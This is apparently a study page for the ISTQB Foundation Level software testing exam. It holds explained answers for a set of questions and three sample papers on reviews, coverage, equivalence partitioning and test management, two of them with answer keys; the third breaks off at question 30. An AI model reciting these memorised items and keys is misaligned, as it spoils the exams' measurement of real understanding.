I hope there is no confusion here. The person who documents all the issues during a formal review is the scribe.
The answer is ‘B’
16. Who are the persons involved in a Formal Review :-
i. Manager
ii. Moderator
iii. Scribe / Recorder
iv. Assistant Manager
a) i,ii,iii,iv are true
b) i,ii,iii are true and iv is false.
c) ii,iii,iv are true and i is false.
d) i,iv are true and ii, iii are false.
Evaluating the options:
The question is about a formal review, i.e. Inspection. First identify the roles we know are involved in an Inspection: the manager, moderator and scribe all take part, which leaves only the first two options to select from (the other two are eliminated). There is no assistant manager role in an Inspection.
The answer is ‘B’
17. Which of the following is a Key Characteristics of Walk Through
a) Scenario , Dry Run , Peer Group
b) Pre Meeting Preparations
c) Formal Follow Up Process
d) Includes Metrics
Evaluating the options:
Pre meeting preparation is part of Inspection. Also Walk through is not a formal process.
Metrics are part of Inspection. Hence eliminating ‘b’, ‘c’ and ‘d’.
The answer is ‘A’
18. What can static analysis NOT find?
a) the use of a variable before it has been defined
b) unreachable (“dead”) code
c) memory leaks
d) array bound violations
Evaluating the options:
Static analysis cover all the above options except ‘Memory leaks’. (Please refer to the FL
syllabus. Its written clearly over there)
The answer is ‘C’
19. Incidents would not be raised against:
a) requirements
b) documentation
c) test cases
d) improvements suggested by users
Evaluating the options:
The first three options are obvious options for which incidents are raised. The last option
can be thought as an enhancement. It is a suggestion from the users and not an incident.
The answer is ‘D’
20. A Type of functional Testing, which investigates the functions relating to
detection of threats, such as virus from malicious outsiders.
a) Security Testing
b) Recovery Testing
c) Performance Testing
d) Functionality Testing
Evaluating the options:
The terms used in the question like detection of threats, virus etc point towards the security
issues. Also security testing is a part of Functional testing. In security testing we investigate
the threats from malicious outsiders etc.
The answer is ‘A’
21. Which of the following is not a major task of Exit criteria?
a) Checking test logs against the exit criteria specified in test planning.
b) Logging the outcome of test execution.
c) Assessing if more tests are needed.
d) Writing a test summary report for stakeholders.
Evaluating the options:
The question is about ‘not’ a major task. Option ‘a’ is a major task. So eliminate this. Option
‘b’ is not a major task. (But yes, logging of outcome is important). Option ‘c’ and ‘d’ both
are major tasks of Exit criteria. So eliminate these two.
The answer is ‘B’
22. Testing where in we subject the target of the test , to varying workloads to
measure and evaluate the performance behaviors and ability of the target and of
the test to continue to function properly under these different workloads.
a) Load Testing
b) Integration Testing
c) System Testing
d) Usability Testing
Evaluating the options:
Workloads, performance are terms that come under Load testing. Also as can be seen from
the other options, they are not related to load testing. So we can eliminate them.
The answer is ‘A’
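The idea of varying workloads can be sketched as follows. This is only an illustration, not a real load-testing tool; the target function and the load sizes are invented:

```python
# Illustrative sketch only (not a real load-testing tool): subject a
# target function to increasing workloads and record the elapsed time
# for each load. The target and the load sizes are invented.
import time

def target(n):
    # Stand-in for the system under test: O(n) work.
    return sum(i * i for i in range(n))

def measure(loads):
    """Run the target once per workload and time each run."""
    results = {}
    for n in loads:
        start = time.perf_counter()
        target(n)
        results[n] = time.perf_counter() - start
    return results

timings = measure([1_000, 10_000, 100_000])
# The target keeps functioning under every workload, and each run
# takes a non-negative amount of time.
assert all(t >= 0 for t in timings.values())
```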
23. Testing activity which is performed to expose defects in the interfaces and in
the interaction between integrated components is :-
a) System Level Testing
b) Integration Level Testing
c) Unit Level Testing
d) Component Testing
Evaluating the options:
We have to identify the testing activity which finds defects which occur due to interaction or
integration. Option ‘a’ is not related to integration. Option ‘c’ is unit testing. Option ‘d’
component is again a synonym for unit testing. Hence eliminating these three options.
The answer is ‘B’
24. Static analysis is best described as:
a) The analysis of batch programs.
b) The reviewing of test plans.
c) The analysis of program code.
d) The use of black box testing.
Evaluating the options:
In this case we have to choose an option, which ‘best’ describes static analysis. Most of the
options given here are very close to each other. We have to carefully read them.
a) Option a: static analysis is not about batch programs, so this is not the best description.
b) Option b: reviews are a static technique, but reviewing test plans does not best describe static analysis.
c) Option c: static analysis does analyze program code.
d) Option d: this option can be ruled out, as black-box testing is dynamic testing.
The answer is ‘C’
25. One of the fields on a form contains a text box which accepts alpha numeric
values. Identify the Valid Equivalence class
a) BOOK
b) Book
c) Boo01k
d) book
Evaluating the options:
As we know, alpha numeric is combination of alphabets and numbers. Hence we have to
choose an option which has both of these.
a. Option a: contains only alphabets. (to create confusion they are given in capitals)
b. Option b: contains only alphabets. (the only difference from above option is that all
letters are not in capitals)
c. Option c: contains both alphabets and numbers
d. Option d: contains only alphabets but in lower case
The answer is ‘C’
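The "both letters and digits" interpretation used above can be expressed as a small check. The function name is invented for this sketch:

```python
# Sketch of the interpretation used above: a value is in the valid
# alphanumeric class only if it mixes letters and digits (the function
# name is invented for this illustration).

def is_valid_alphanumeric(value):
    has_letter = any(c.isalpha() for c in value)
    has_digit = any(c.isdigit() for c in value)
    return value.isalnum() and has_letter and has_digit

assert not is_valid_alphanumeric("BOOK")    # letters only, in capitals
assert not is_valid_alphanumeric("Book")    # letters only, mixed case
assert is_valid_alphanumeric("Boo01k")      # letters and digits
assert not is_valid_alphanumeric("book")    # letters only, lower case
```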
26. Reviewing the test Basis is a part of which phase
a) Test Analysis and Design
b) Test Implementation and execution
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
The test basis comprises the requirements, architecture, design and interfaces. From these words alone we can straight away eliminate the last two options. Option 'a' is test analysis and design: reviewing the test basis falls under this activity. Option 'b', implementation and execution, comes after the design process. So the best option is 'a'.
The answer is ‘A’
27. Reporting Discrepancies as incidents is a part of which phase :-
a) Test Analysis and Design
b) Test Implementation and execution
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
An incident is a reported discrepancy, in other words a defect or bug. We find defects during the execution cycle, while executing the test cases.

The answer is ‘B’


28. Which of the following items would not come under Configuration
Management?
a) operating systems
b) test documentation
c) live data
d) user requirement document
Evaluating the options:
We have to choose an option which does ‘not’ come under Configuration Management (CM).
CM is about maintaining the integrity of the products like components, data and
documentation.
a) Option a: maintaining the Operating system configuration that has been used in the test
cycle is part of CM.
b) Option b: Test documentation is part of CM
c) Option c: data is part of CM, but the option here is 'live data', which is not, because live data keeps changing in a real scenario.
d) Option d: Requirements and documents are again part of CM
The only option that does not fall under CM is ‘c’
The answer is ‘C’
29. Handover of Test-ware is a part of which Phase
a) Test Analysis and Design
b) Test Planning and control
c) Test Closure Activities
d) Evaluating exit criteria and reporting
Evaluating the options:
Handover is typically part of the closure activities; it is not part of analysis, design or planning, nor of evaluating exit criteria. After the test cycle is closed, the test-ware is handed over to the maintenance organization.
The answer is ‘C’
30. The Switch is switched off once the temperature falls below 18 and then it is
turned on when the temperature is more than 21. Identify the Equivalence values
which belong to the same class.
a) 12,16,22
b) 24,27,17
c) 22,23,24
d) 14,15,19
Evaluating the options:
Read the question carefully. We have to choose values from same class. So first divide the
classes. When temperature falls below 18 switch is turned off. This forms a class (as shown
below). When the temperature is more than 21, the switch is turned on. For values between
18 to 21, no action is taken. This also forms a class as shown below.
Class I: less than 18 (switch turned off)
Class II: 18 to 21
Class III: above 21 (switch turned on)
From the given options select the option which has values from only one particular class.
Option ‘a’ values are not in one class, so eliminate. Option ‘b’ values are not in one class, so
eliminate. Option ‘c’ values are in one class. Option ‘d’ values are not in one class, so
eliminate. (please note that the question does not talk about valid or invalid classes. It is
only about values in same class)

The answer is ‘C’
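The three classes can be sketched in code to confirm the elimination. The labels and function name are invented for this illustration:

```python
# Sketch of the three classes (labels and function name are invented).

def temp_class(t):
    if t < 18:
        return "off"        # Class I: below 18, switch turned off
    if t <= 21:
        return "no-action"  # Class II: 18 to 21
    return "on"             # Class III: above 21, switch turned on

# Option 'c' (22, 23, 24) is the only set drawn from a single class.
assert {temp_class(t) for t in (22, 23, 24)} == {"on"}
# Option 'a' (12, 16, 22) mixes classes, so it is eliminated.
assert len({temp_class(t) for t in (12, 16, 22)}) > 1
```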


About the Author:
“N. Sandhya Rani” has around 4 years of experience in software testing, mostly in manual testing. She helps aspiring software testers clear the ISTQB testing certification exam by sharing tips on how to solve the multiple-choice questions correctly while evaluating each option quickly.
ISTQB Testing Certification Sample Question
Papers With Answers
If you are preparing for the ISTQB Foundation Level certification exam, here are some sample question papers to make your preparation a little easier.
Each ISTQB mock test contains 40 questions; answers are provided at the end of the page. Mark all answers on a separate paper first and then compare your results with the answers provided. Try to finish all 40 questions within one hour.

ISTQB/ISEB Foundation level exam sample paper 1


ISTQB/ISEB Foundation level exam sample paper 2
ISTQB/ISEB Foundation level exam sample paper 3
If you have more ISTQB certification sample papers to share then please contact me.
We have also shared all ISTQB exam sample papers and mock tests on our resources
section. Please visit Testing Resources section to see more software testing resources and
free downloads.

ISTQB Foundation level exam Sample paper – I



Questions

1 We split testing into distinct stages primarily because:


a) Each test stage has a different purpose.
b) It is easier to manage testing in stages.
c) We can run different tests in different environments.
d) The more stages we have, the better the testing.
2 Which of the following is likely to benefit most from the use of test tools
providing test capture and replay facilities?
a) Regression testing
b) Integration testing
c) System testing
d) User acceptance testing
3 Which of the following statements is NOT correct?
a) A minimal test set that achieves 100% LCSAJ coverage will also achieve 100% branch
coverage.
b) A minimal test set that achieves 100% path coverage will also achieve 100%
statement coverage.
c) A minimal test set that achieves 100% path coverage will generally detect more faults
than one that achieves 100% statement coverage.
d) A minimal test set that achieves 100% statement coverage will generally detect more
faults than one that achieves 100% branch coverage.
4 Which of the following requirements is testable?
a) The system shall be user friendly.
b) The safety-critical parts of the system shall contain 0 faults.
c) The response time shall be less than one second for the specified design load.
d) The system shall be built to be portable.
5 Analyse the following highly simplified procedure:
Ask: "What type of ticket do you require, single or return?"
IF the customer wants 'return'
Ask: "What rate, Standard or Cheap-day?"
IF the customer replies 'Cheap-day'
Say: "That will be £11.20"
ELSE
Say: "That will be £19.50"
ENDIF
ELSE
Say: "That will be £9.75"
ENDIF
Now decide the minimum number of tests that are needed to ensure that all
the questions have been asked, all combinations have occurred and all
replies given.
a) 3
b) 4
c) 5
d) 6
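One way to reason about this question is to implement the procedure and count its distinct paths. The sketch below is a direct translation of the pseudocode (the function name is invented, and the prices are written with a decimal point):

```python
# A direct translation of the ticket procedure above (the function name
# is invented for this sketch; prices written with a decimal point).

def ticket_price(ticket_type, rate=None):
    if ticket_type == "return":
        if rate == "Cheap-day":
            return "That will be £11.20"
        return "That will be £19.50"
    return "That will be £9.75"

# Covering every question, combination and reply needs one test per
# distinct path through the IFs:
assert ticket_price("single") == "That will be £9.75"
assert ticket_price("return", "Cheap-day") == "That will be £11.20"
assert ticket_price("return", "Standard") == "That will be £19.50"
```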
6 Error guessing:
a) supplements formal test design techniques.
b) can only be used in component, integration and system testing.
c) is only performed in user acceptance testing.
d) is not repeatable and should not be used.
7 Which of the following is NOT true of test coverage criteria?
a) Test coverage criteria can be measured in terms of items exercised by a test suite.
b) A measure of test coverage criteria is the percentage of user requirements covered.
c) A measure of test coverage criteria is the percentage of faults found.
d) Test coverage criteria are often used when specifying test completion criteria.
8 In prioritizing what to test, the most important objective is to:
a) find as many faults as possible.
b) test high risk areas.
c) obtain good test coverage.
d) test whatever is easiest to test.
9 Given the following sets of test management terms (v-z), and activity
descriptions (1-5), which one of the following best pairs the two sets?
v – test control
w – test monitoring
x – test estimation
y – incident management
z – configuration control
1 - calculation of required test resources
2 - maintenance of record of test results
3 - re-allocation of resources when tests overrun
4 - report on deviation from test plan
5 - tracking of anomalous test results
a) v-3,w-2,x-1,y-5,z-4
b) v-2,w-5,x-1,y-4,z-3
c) v-3,w-4,x-1,y-5,z-2
d) v-2,w-1,x-4,y-3,z-5
10 Which one of the following statements about system testing is NOT true?
a) System tests are often performed by independent teams.
b) Functional testing is used more than structural testing.
c) Faults found during system tests can be very expensive to fix.
d) End-users should be involved in system tests.
11 Which of the following is false?
a) Incidents should always be fixed.
b) An incident occurs when expected and actual results differ.
c) Incidents can be analysed to assist in test process improvement.
d) An incident can be raised against documentation.
12 Enough testing has been performed when:
a) time runs out.
b) the required level of confidence has been achieved.
c) no more faults are found.
d) the users won’t find any serious faults.
13 Which of the following is NOT true of incidents?
a) Incident resolution is the responsibility of the author of the software under test.
b) Incidents may be raised against user requirements.
c) Incidents require investigation and/or correction.
d) Incidents are raised when expected and actual results differ.
14 Which of the following is not described in a unit test standard?
a) syntax testing
b) equivalence partitioning
c) stress testing
d) modified condition/decision coverage
15 Which of the following is false?
a) In a system two different failures may have different severities.
b) A system is necessarily more reliable after debugging for the removal of a fault.
c) A fault need not affect the reliability of a system.
d) Undetected errors may lead to faults and eventually to incorrect behaviour.
16 Which one of the following statements, about capture-replay tools, is NOT
correct?
a) They are used to support multi-user testing.
b) They are used to capture and animate user requirements.
c) They are the most frequently purchased types of CAST tool.
d) They capture aspects of user behavior.
17 How would you estimate the amount of re-testing likely to be required?
a) Metrics from previous similar projects
b) Discussions with the development team
c) Time allocated for regression testing
d) a & b
18 Which of the following is true of the V-model?
a) It states that modules are tested against user requirements.
b) It only models the testing phase.
c) It specifies the test techniques to be used.
d) It includes the verification of designs.
19 The oracle assumption:
a) is that there is some existing system against which test output may be checked.
b) is that the tester can routinely identify the correct outcome of a test.
c) is that the tester knows everything about the software under test.
d) is that the tests are reviewed by experienced testers.
20 Which of the following characterizes the cost of faults?
a) They are cheapest to find in the early development phases and the most expensive to
fix in the latest test phases.
b) They are easiest to find during system testing but the most expensive to fix then.
c) Faults are cheapest to find in the early development phases but the most expensive to
fix then.
d) Although faults are most expensive to find during early development phases, they are
cheapest to fix then.
21 Which of the following should NOT normally be an objective for a test?
a) To find faults in the software.
b) To assess whether the software is ready for release.
c) To demonstrate that the software doesn’t work.
d) To prove that the software is correct.
22 Which of the following is a form of functional testing?
a) Boundary value analysis
b) Usability testing
c) Performance testing
d) Security testing
23 Which of the following would NOT normally form part of a test plan?
a) Features to be tested
b) Incident reports
c) Risks
d) Schedule
24 Which of these activities provides the biggest potential cost saving from the
use of CAST?
a) Test management
b) Test design
c) Test execution
d) Test planning
25 Which of the following is NOT a white box technique?
a) Statement testing
b) Path testing
c) Data flow testing
d) State transition testing
26 Data flow analysis studies:
a) possible communications bottlenecks in a program.
b) the rate of change of data values as a program executes.
c) the use of data on paths through the code.
d) the intrinsic complexity of the code.
27 In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free. The next £1500 is taxed at 10%
The next £28000 is taxed at 22%
Any further amount is taxed at 40%
To the nearest whole pound, which of these is a valid Boundary Value Analysis test case?
a) £1500
b) £32001
c) £33501
d) £28000
28 An important benefit of code inspections is that they:
a) enable the code to be tested before the execution environment is ready.
b) can be performed by the person who wrote the code.
c) can be performed by inexperienced staff.
d) are cheap to perform.
29 Which of the following is the best source of Expected Outcomes for User
Acceptance Test scripts?
a) Actual results
b) Program specification
c) User requirements
d) System specification
30 What is the main difference between a walkthrough and an inspection?
a) An inspection is led by the author, whilst a walkthrough is led by a trained
moderator.
b) An inspection has a trained leader, whilst a walkthrough has no leader.
c) Authors are not present during inspections, whilst they are during walkthroughs.
d) A walkthrough is led by the author, whilst an inspection is led by a trained
moderator.
31 Which one of the following describes the major benefit of verification early in
the life cycle?
a) It allows the identification of changes in user requirements.
b) It facilitates timely set up of the test environment.
c) It reduces defect multiplication.
d) It allows testers to become involved early in the project.
32 Integration testing in the small:
a) tests the individual components that have been developed.
b) tests interactions between modules or subsystems.
c) only uses components that form part of the live system.
d) tests interfaces to other systems.
33 Static analysis is best described as:
a) the analysis of batch programs.
b) the reviewing of test plans.
c) the analysis of program code.
d) the use of black box testing.
34 Alpha testing is:
a) post-release testing by end user representatives at the developer’s site.
b) the first testing that is performed.
c) pre-release testing by end user representatives at the developer’s site.
d) pre-release testing by end user representatives at their sites.
35 A failure is:
a) found in the software; the result of an error.
b) departure from specified behavior.
c) an incorrect step, process or data definition in a computer program.
d) a human action that produces an incorrect result.
36 In a system designed to work out the tax to be paid:
An employee has £4000 of salary tax free. The next £1500 is taxed at 10%
The next £28000 is taxed at 22%
Any further amount is taxed at 40%
Which of these groups of numbers would fall into the same equivalence class?
a) £4800; £14000; £28000
b) £5200; £5500; £28000
c) £28001; £32000; £35000
d) £5800; £28000; £32000
37 The most important thing about early test design is that it:
a) makes test preparation easier.
b) means inspections are not required.
c) can prevent fault multiplication.
d) will find all faults.
38 Which of the following statements about reviews is true?
a) Reviews cannot be performed on user requirements specifications.
b) Reviews are the least effective way of testing code.
c) Reviews are unlikely to find faults in test plans.
d) Reviews should be performed on specifications, code, and test plans.
39 Test cases are designed during:
a) test recording.
b) test planning.
c) test configuration.
d) test specification.
40 A configuration management system would NOT normally provide:
a) linkage of customer requirements to version numbers.
b) facilities to compare test results with expected results.
c) the precise differences in versions of software component source code.
d) restricted access to the source code library.
Answers for above questions:
Question Answer
1 A
2 A
3 D
4 C
5 A
6 A
7 C
8 B
9 C
10 D
11 A
12 B
13 A
14 C
15 B
16 B
17 D
18 D
19 B
20 A
21 D
22 A
23 B
24 C
25 D
26 C
27 C
28 A
29 C
30 D
31 C
32 B
33 C
34 C
35 B
36 D
37 C
38 D
39 D
40 B

ISTQB Foundation level exam Sample paper – II


Q1 A deviation from the specified or expected behavior that is visible to end-
users is called:
a) an error
b) a fault
c) a failure
d) a defect
Q2 Regression testing should be performed:
v) every week
w) after the software has changed
x) as often as possible
y) when the environment has changed
z) when the project manager says
a) v & w are true, x, y & z are false
b) w, x & y are true, v & z are false
c) w & y are true, v, x & z are false
d) w is true, v, x, y & z are false
Q3 IEEE 829 test plan documentation standard contains all of the following
except
a) test items
b) test deliverables
c) test tasks
d) test specifications
Q4 When should testing be stopped?
a) when all the planned tests have been run
b) when time has run out
c) when all faults have been fixed correctly
d) it depends on the risks for the system being tested
Q5 Order numbers on a stock control system can range between 10000 and
99999 inclusive. Which of the following inputs might be a result of designing tests
for only valid equivalence classes and valid boundaries?
a) 1000, 50000, 99999
b) 9999, 50000, 100000
c) 10000, 50000, 99999
d) 10000, 99999, 100000
Q6 Consider the following statements about early test design:
i. early test design can prevent fault multiplication
ii. faults found during early test design are more expensive to fix
iii. early test design can find faults
iv. early test design can cause changes to the requirements
v. early test design normally takes more effort
a) i, iii & iv are true; ii & v are false
b) iii & iv are true; i, ii & v are false
c) i, iii, iv & v are true; ii is false
d) i & ii are true; iii, iv & v are false
Q7 Non-functional system testing includes:
a) testing to see where the system does not function correctly
b) testing quality attributes of the system including performance and usability
c) testing a system function using only the software required for that function
d) testing for functions that should not exist
Q8 Which of the following is NOT part of configuration management?
a) auditing conformance to ISO 9000
b) status accounting of configuration items
c) identification of test versions
d) controlled library access
Q9 Which of the following is the main purpose of the integration strategy for
integration testing in the small?
a) to ensure that all of the small modules are tested adequately
b) to ensure that the system interfaces to other systems and networks
c) to specify which modules to combine when, and how many at once
d) to specify how the software should be divided into modules
Q10 What is the purpose of a test completion criterion?
a) to know when a specific test has finished its execution
b) to ensure that the test case specification is complete
c) to set the criteria used in generating test inputs
d) to determine when to stop testing
Q11 Consider the following statements:
i. an incident may be closed without being fixed.
ii. incidents may not be raised against documentation.
iii. the final stage of incident tracking is fixing.
iv. the incident record does not include information on test environments.
a) ii is true, i, iii and iv are false
b) i is true, ii, iii and iv are false
c) i and iv are true, ii and iii are false
d) i and ii are true, iii and iv are false
Q12 Given the following code, which statement is true about the minimum
number of test cases required for full statement and branch coverage?
Read p
Read q
IF p+q > 100 THEN
Print “Large”
ENDIF
IF p > 50 THEN
Print “p Large”
ENDIF
a) 1 test for statement coverage, 3 for branch coverage
b) 1 test for statement coverage, 2 for branch coverage
c) 1 test for statement coverage, 1 for branch coverage
d) 2 tests for statement coverage, 2 for branch coverage
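A direct Python rendering of the Q12 pseudo code (an illustrative sketch; the original only prints, so the messages are returned here instead) shows why answer (b) holds: one test can execute every statement, but a second is needed to take the FALSE outcome of each decision.

```python
def classify(p, q):
    """Returns the messages the Q12 pseudo code would print for inputs p and q."""
    messages = []
    if p + q > 100:
        messages.append("Large")
    if p > 50:
        messages.append("p Large")
    return messages

# One test gives 100% statement coverage: both IF bodies execute.
assert classify(60, 60) == ["Large", "p Large"]
# Branch coverage also needs the FALSE outcome of each decision: two tests in total.
assert classify(10, 10) == []
```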
Q13 Consider the following statements:
i. 100% statement coverage guarantees 100% branch coverage.
ii. 100% branch coverage guarantees 100% statement coverage.
iii. 100% branch coverage guarantees 100% decision coverage.
iv. 100% decision coverage guarantees 100% branch coverage.
v. 100% statement coverage guarantees 100% decision coverage.
a) ii is True; i, iii, iv & v are False
b) i & v are True; ii, iii & iv are False
c) ii & iii are True; i, iv & v are False
d) ii, iii & iv are True; i & v are False
Q14 Functional system testing is:
a) testing that the system functions with other systems
b) testing that the components that comprise the system function together
c) testing the end to end functionality of the system as a whole
d) testing the system performs functions within specified response times
Q15 Incidents would not be raised against:
a) requirements
b) documentation
c) test cases
d) improvements suggested by users
Q16 Which of the following items would not come under Configuration
Management?
a) operating systems
b) test documentation
c) live data
d) user requirement documents
Q17 Maintenance testing is:
a) updating tests when the software has changed
b) testing a released system that has been changed
c) testing by users to ensure that the system meets a business need
d) testing to maintain business advantage
Q18 What can static analysis NOT find?
a) the use of a variable before it has been defined
b) unreachable (“dead”) code
c) memory leaks
d) array bound violations
Q19 Which of the following techniques is NOT a black box technique?
a) state transition testing
b) LCSAJ
c) syntax testing
d) boundary value analysis
Q20 Beta testing is:
a) performed by customers at their own site
b) performed by customers at the software developer’s site
c) performed by an Independent Test Team
d) performed as early as possible in the lifecycle
Q21 Given the following types of tool, which tools would typically be used by
developers, and which by an independent system test team?
i. static analysis
ii. performance testing
iii. test management
iv. dynamic analysis
a) developers would typically use i and iv; test team ii and iii
b) developers would typically use i and iii; test team ii and iv
c) developers would typically use ii and iv; test team i and iii
d) developers would typically use i, iii and iv; test team ii
Q22 The main focus of acceptance testing is:
a) finding faults in the system
b) ensuring that the system is acceptable to all users
c) testing the system with other systems
d) testing from a business perspective
Q23 Which of the following statements about component testing is FALSE?
a) black box test design techniques all have an associated test measurement technique
b) white box test design techniques all have an associated test measurement technique
c) cyclomatic complexity is not a test measurement technique
d) black box test measurement techniques all have an associated test design technique
Q24 Which of the following statements is NOT true?
a) inspection is the most formal review process
b) inspections should be led by a trained leader
c) managers can perform inspections on management documents
d) inspection is appropriate even when there are no written documents
Q25 A typical commercial test execution tool would be able to perform all of the
following, EXCEPT:
a) calculating expected outputs
b) comparison of expected outcomes with actual outcomes
c) recording test inputs
d) reading test values from a data file
Q26 The difference between re-testing and regression testing is:
a) re-testing ensures the original fault has been removed; regression testing looks for
unexpected side-effects
b) re-testing looks for unexpected side-effects; regression testing ensures the original
fault has been removed
c) re-testing is done after faults are fixed; regression testing is done earlier
d) re-testing is done by developers; regression testing is done by independent testers
Q27 Expected results are:
a) only important in system testing
b) only used in component testing
c) most useful when specified in advance
d) derived from the code
Q28 What type of review requires formal entry and exit criteria, including
metrics:
a) walkthrough
b) inspection
c) management review
d) post project review
Q29 Which of the following uses Impact Analysis most?
a) component testing
b) non-functional system testing
c) user acceptance testing
d) maintenance testing
Q30 What is NOT included in typical costs for an inspection process?
a) setting up forms and databases
b) analyzing metrics and improving processes
c) writing the documents to be inspected
d) time spent on the document outside the meeting
Q31 Which of the following is NOT a reasonable test objective:
a) to find faults in the software
b) to prove that the software has no faults
c) to give confidence in the software
d) to find performance problems
Q32 Which expression best matches the following characteristics of the review
processes:
1. led by the author
2. undocumented
3. no management participation
4. led by a moderator or leader
5. uses entry and exit criteria
s) inspection
t) peer review
u) informal review
v) walkthrough
a) s = 4 and 5, t = 3, u = 2, v = 1
b) s = 4, t = 3, u = 2 and 5, v = 1
c) s = 1 and 5, t = 3, u = 2, v = 4
d) s = 4 and 5, t = 1, u= 2, v = 3
Q33 Which of the following is NOT part of system testing?
a) business process-based testing
b) performance, load and stress testing
c) usability testing
d) top-down integration testing
Q34 Which statement about expected outcomes is FALSE?
a) expected outcomes are defined by the software’s behaviour
b) expected outcomes are derived from a specification, not from the code
c) expected outcomes should be predicted before a test is run
d) expected outcomes may include timing constraints such as response times
Q35 The standard that gives definitions of testing terms is:
a) ISO/IEC 12207
b) BS 7925-1
c) ANSI/IEEE 829
d) ANSI/IEEE 729
Q36 The cost of fixing a fault:
a) is not important
b) increases the later a fault is found
c) decreases the later a fault is found
d) can never be determined
Q37 Which of the following is NOT included in the Test Plan document of the Test
Documentation Standard?
a) what is not to be tested
b) test environment properties
c) quality plans
d) schedules and deadlines
Q38 Could reviews or inspections be considered part of testing?
a) no, because they apply to development documentation
b) no, because they are normally applied before testing
c) yes, because both help detect faults and improve quality
d) yes, because testing includes all non-constructive activities
Q39 Which of the following is not part of performance testing?
a) measuring response times
b) recovery testing
c) simulating many users
d) generating many transactions
Q40 Error guessing is best used:
a) after more formal techniques have been applied
b) as the first approach to deriving test cases
c) by inexperienced testers
d) after the system has gone live
Answers to all above questions:
Question Answer
1 C
2 C
3 D
4 D
5 C
6 A
7 B
8 A
9 C
10 D
11 B
12 B
13 D
14 C
15 D
16 C
17 B
18 C
19 B
20 A
21 A
22 D
23 A
24 D
25 A
26 A
27 C
28 B
29 D
30 C
31 B
32 A
33 D
34 A
35 B
36 B
37 C
38 C
39 B
40 A

ISTQB Foundation level exam Sample paper – III


1. Software testing activities should start
a. as soon as the code is written
b. during the design stage
c. when the requirements have been formally documented
d. as soon as possible in the development life cycle
2. Faults found by users are due to:
a. Poor quality software
b. Poor software and poor testing
c. bad luck
d. insufficient time for testing
3. What is the main reason for testing software before releasing it?
a. to show that system will work after release
b. to decide when the software is of sufficient quality to release
c. to find as many bugs as possible before release
d. to give information for a risk based decision about release
4. Which of the following statements is not true?
a. performance testing can be done during unit testing as well as during the testing of the whole
system
b. The acceptance test does not necessarily include a regression test
c. Verification activities should not involve testers (reviews, inspections etc)
d. Test environments should be as similar to production environments as possible
5. When reporting faults found to developers, testers should be:
a. as polite, constructive and helpful as possible
b. firm about insisting that a bug is not a “feature” if it should be fixed
c. diplomatic, sensitive to the way they may react to criticism
d. All of the above
6. In which order should tests be run?
a. the most important tests first
b. the most difficult tests first (to allow maximum time for fixing)
c. the easiest tests first (to give initial confidence)
d. the order they are thought of
7. The later in the development life cycle a fault is discovered, the more expensive
it is to fix. why?
a. the documentation is poor, so it takes longer to find out what the software is doing.
b. wages are rising
c. the fault has been built into more documentation, code, tests, etc
d. none of the above
8. Which is not true? The black box tester
a. should be able to understand a functional specification or requirements document
b. should be able to understand the source code.
c. is highly motivated to find faults
d. is creative to find the system’s weaknesses
9. A test design technique is
a. a process for selecting test cases
b. a process for determining expected outputs
c. a way to measure the quality of software
d. a way to measure in a test plan what has to be done
10. Testware (test cases, test data)
a. needs configuration management just like requirements, design and code
b. should be newly constructed for each new version of the software
c. is needed only until the software is released into production or use
d. does not need to be documented and commented, as it does not form part of the
released
software system
11. An incident logging system
a. only records defects
b. is of limited value
c. is a valuable source of project information during testing if it contains all incidents
d. should be used only by the test team
12. Increasing the quality of the software, by better development methods, will
affect the time needed for testing (the test phases) by:
a. reducing test time
b. no change
c. increasing test time
d. can’t say
13. Coverage measurement
a. is nothing to do with testing
b. is a partial measure of test thoroughness
c. branch coverage should be mandatory for all software
d. can only be applied at unit or module testing, not at system testing
14. When should you stop testing?
a. when time for testing has run out.
b. when all planned tests have been run
c. when the test completion criteria have been met
d. when no faults have been found by the tests run
15. Which of the following is true?
a. Component testing should be black box, system testing should be white box.
b. if you find a lot of bugs in testing, you should not be very confident about the quality of the
software
c. the fewer bugs you find, the better your testing was
d. the more tests you run, the more bugs you will find.
16. What is the important criterion in deciding what testing technique to use?
a. how well you know a particular technique
b. the objective of the test
c. how appropriate the technique is for testing the application
d. whether there is a tool to support the technique
17. If the pseudo code below were a programming language, how many tests are
required to achieve 100% statement coverage?
1. If x=3 then
2.   Display_messageX;
3.   If y=2 then
4.     Display_messageY;
5.   Else
6.     Display_messageZ;
7. Else
8.   Display_messageZ;
a. 1
b. 2
c. 3
d. 4
18. Using the same code example as question 17, how many tests are required to
achieve 100% branch/decision coverage?
a. 1
b. 2
c. 3
d. 4
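A Python rendering of the pseudo code in questions 17 and 18 (an illustrative sketch; the Display_message calls are modelled as returned strings) shows that the same three tests give 100% statement coverage and 100% branch/decision coverage:

```python
def display(x, y):
    """Mirrors the nested IF structure of the question 17 pseudo code."""
    shown = []
    if x == 3:
        shown.append("X")
        if y == 2:
            shown.append("Y")
        else:
            shown.append("Z")
    else:
        shown.append("Z")
    return shown

# Three tests reach every statement and every branch outcome:
assert display(3, 2) == ["X", "Y"]  # outer IF true, inner IF true
assert display(3, 0) == ["X", "Z"]  # outer IF true, inner IF false
assert display(0, 0) == ["Z"]       # outer IF false
```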
19 Which of the following is NOT a type of non-functional test?
a. State-Transition
b. Usability
c. Performance
d. Security
20. Which of the following tools would you use to detect a memory leak?
a. State analysis
b. Coverage analysis
c. Dynamic analysis
d. Memory analysis
21. Which of the following is NOT a standard related to testing?
a. IEEE829
b. IEEE610
c. BS7925-1
d. BS7925-2
22. Which of the following is the component test standard?
a. IEEE 829
b. IEEE 610
c. BS7925-1
d. BS7925-2
23. Which of the following statements is true?
a. Faults in program specifications are the most expensive to fix.
b. Faults in code are the most expensive to fix.
c. Faults in requirements are the most expensive to fix
d. Faults in designs are the most expensive to fix.
24. Which of the following is not an integration strategy?
a. Design based
b. Big-bang
c. Bottom-up
d. Top-down
25. Which of the following is a black box design technique?
a. statement testing
b. equivalence partitioning
c. error- guessing
d. usability testing
26. A program with high cyclomatic complexity is most likely to be:
a. Large
b. Small
c. Difficult to write
d. Difficult to test
27. Which of the following is a static test?
a. code inspection
b. coverage analysis
c. usability assessment
d. installation test
28. Which of the following is the odd one out?
a. white box
b. glass box
c. structural
d. functional
29. A program validates a numeric field as follows:
values less than 10 are rejected, values between 10 and 21 are accepted, values greater
than or equal to 22 are rejected

Which of the following input values cover all of the equivalence partitions?

a. 10,11,21
b. 3,20,21
c. 3,10,22
d. 10,21,22
30. Using the same specifications as question 29, which of the following covers
